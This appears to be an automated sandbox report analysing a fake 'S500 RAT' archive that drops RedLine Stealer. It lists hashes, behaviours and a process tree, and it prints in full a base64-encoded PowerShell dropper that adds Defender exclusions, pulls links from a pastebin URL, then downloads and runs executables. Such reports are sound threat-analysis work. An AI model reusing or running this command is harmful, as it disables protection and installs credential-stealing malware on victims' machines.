Analysis

  • max time kernel
    35s
  • max time network
    37s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-12-2024 17:00

General

  • Target

    S500 RAT.zip

  • Size

    40.4MB

  • MD5

    148feb47315d32610c00f3f5db8a1e7b

  • SHA1

    cb14479bdef8aa05fbcf4b845c42d890dd19fd96

  • SHA256

    2e466546d957cccb664961cecbe93fdfa718115b2d17419e1a13a5ad8fceeab2

  • SHA512

    e70e12d459aa503bdea92e191f92e6b05e71ac3638b8c003139a73579c34a8feac6ab7835ed68edeebfdf29f1f463bcab83b50bdf4209df470e8318956e4b529

  • SSDEEP

    786432:q0Y+JAFl0rE/WmcnKPloVCcEjIi/O/mK+fP1JqsvGnPm5WgTutHHJEDTJbM:YFu4EnMloOIiBBq3PguBpwTZM

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://pastebin.com/raw/p2s7tDSd

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Redline family
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT.zip"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4276
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:4396
    • C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
      "C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Users\Admin\AppData\Local\Temp\build.exe
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4408
      • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Users\Admin\AppData\Local\Temp\blackCC.exe
          "C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4812
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
            4⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1664
    • C:\Users\Admin\Desktop\S500 RAT\crack.exe
      "C:\Users\Admin\Desktop\S500 RAT\crack.exe"
      1⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:428
    • C:\Users\Admin\Desktop\S500 RAT\crack.exe
      "C:\Users\Admin\Desktop\S500 RAT\crack.exe"
      1⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4104

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe

      Filesize

      17.8MB

      MD5

      e5f9792d0889af4fb6c295c5e0d74cee

      SHA1

      1aabebd0923a3e4e1772b48294c7b0fc86973e71

      SHA256

      c5f99ca677d1b5aade06ab17adfa2a5c064c89e2f52875aefbca071ae2189f7f

      SHA512

      4290a88de6fb0e6f851beff8577467760d1fa6afeda0d8a0afd50f6f7ad77d3960c0742260bdc87154c828a67f5807680dc8093386bbcd0ab97ccf8091b1b288

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q03bbmdz.wbv.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\blackCC.exe

      Filesize

      72KB

      MD5

      462b459a2560b65a657cfecce53d682a

      SHA1

      f0ce24faf42d2d1453c4f18fda0223b83486e5ae

      SHA256

      00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db

      SHA512

      5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b

    • C:\Users\Admin\AppData\Local\Temp\build.exe

      Filesize

      506KB

      MD5

      e5fb57e8214483fd395bd431cb3d1c4b

      SHA1

      60e22fc9e0068c8156462f003760efdcac82766b

      SHA256

      e389fc5782f754918a10b020adcd8faa11c25658b8d6f8cbc49f9ac3a7637684

      SHA512

      dc2ed0421db7dd5a3afeacb6a9f5017c97fc07d0b2d1745b50ede50087a58245d31d6669077a672b32541dbfa233ef87260a37be48de3bd407d8c587fc903d89

    • C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe

      Filesize

      18.8MB

      MD5

      f940122c21ea007b2867c03d31fa430c

      SHA1

      efc7dada2c5f732df107a900277a04a57d2354bb

      SHA256

      8587703a22f7b8d33fdcd3f3328344710c1c126a3cb18ccdfb0ff4d18bb0222c

      SHA512

      6cc779db44162fb2b60bf5da0dff711a106a1626434b2ef4e39e658e40a39cbb3074c5836a94ec8ceddbf78cebaf254278a125479abcf1797c5dc5f77a2bb99c

    • memory/428-307-0x0000000000900000-0x0000000000956000-memory.dmp

      Filesize

      344KB

    • memory/1404-264-0x0000000000400000-0x00000000015D4000-memory.dmp

      Filesize

      17.8MB

    • memory/1664-294-0x0000000007B20000-0x000000000819A000-memory.dmp

      Filesize

      6.5MB

    • memory/1664-281-0x0000000007350000-0x0000000007382000-memory.dmp

      Filesize

      200KB

    • memory/1664-302-0x0000000007740000-0x0000000007748000-memory.dmp

      Filesize

      32KB

    • memory/1664-301-0x0000000007750000-0x000000000776A000-memory.dmp

      Filesize

      104KB

    • memory/1664-300-0x0000000007710000-0x0000000007724000-memory.dmp

      Filesize

      80KB

    • memory/1664-265-0x0000000004BC0000-0x0000000004BF6000-memory.dmp

      Filesize

      216KB

    • memory/1664-266-0x0000000005340000-0x0000000005968000-memory.dmp

      Filesize

      6.2MB

    • memory/1664-267-0x00000000052C0000-0x00000000052E2000-memory.dmp

      Filesize

      136KB

    • memory/1664-269-0x0000000005B40000-0x0000000005BA6000-memory.dmp

      Filesize

      408KB

    • memory/1664-268-0x0000000005A20000-0x0000000005A86000-memory.dmp

      Filesize

      408KB

    • memory/1664-299-0x0000000007700000-0x000000000770E000-memory.dmp

      Filesize

      56KB

    • memory/1664-279-0x0000000005CB0000-0x0000000006004000-memory.dmp

      Filesize

      3.3MB

    • memory/1664-280-0x0000000006160000-0x000000000617E000-memory.dmp

      Filesize

      120KB

    • memory/1664-298-0x00000000076E0000-0x00000000076F1000-memory.dmp

      Filesize

      68KB

    • memory/1664-282-0x0000000073AA0000-0x0000000073AEC000-memory.dmp

      Filesize

      304KB

    • memory/1664-292-0x0000000006740000-0x000000000675E000-memory.dmp

      Filesize

      120KB

    • memory/1664-293-0x0000000007390000-0x0000000007433000-memory.dmp

      Filesize

      652KB

    • memory/1664-297-0x0000000007780000-0x0000000007816000-memory.dmp

      Filesize

      600KB

    • memory/1664-295-0x00000000074E0000-0x00000000074FA000-memory.dmp

      Filesize

      104KB

    • memory/1664-296-0x0000000007530000-0x000000000753A000-memory.dmp

      Filesize

      40KB

    • memory/2908-247-0x0000000000400000-0x00000000016D3000-memory.dmp

      Filesize

      18.8MB

    • memory/4104-312-0x0000000000D70000-0x0000000000DC6000-memory.dmp

      Filesize

      344KB

    • memory/4408-252-0x00000000055C0000-0x00000000055FC000-memory.dmp

      Filesize

      240KB

    • memory/4408-249-0x0000000005B60000-0x0000000006178000-memory.dmp

      Filesize

      6.1MB

    • memory/4408-250-0x0000000005560000-0x0000000005572000-memory.dmp

      Filesize

      72KB

    • memory/4408-251-0x0000000005690000-0x000000000579A000-memory.dmp

      Filesize

      1.0MB

    • memory/4408-253-0x0000000005610000-0x000000000565C000-memory.dmp

      Filesize

      304KB

    • memory/4408-235-0x0000000000BA0000-0x0000000000BF6000-memory.dmp

      Filesize

      344KB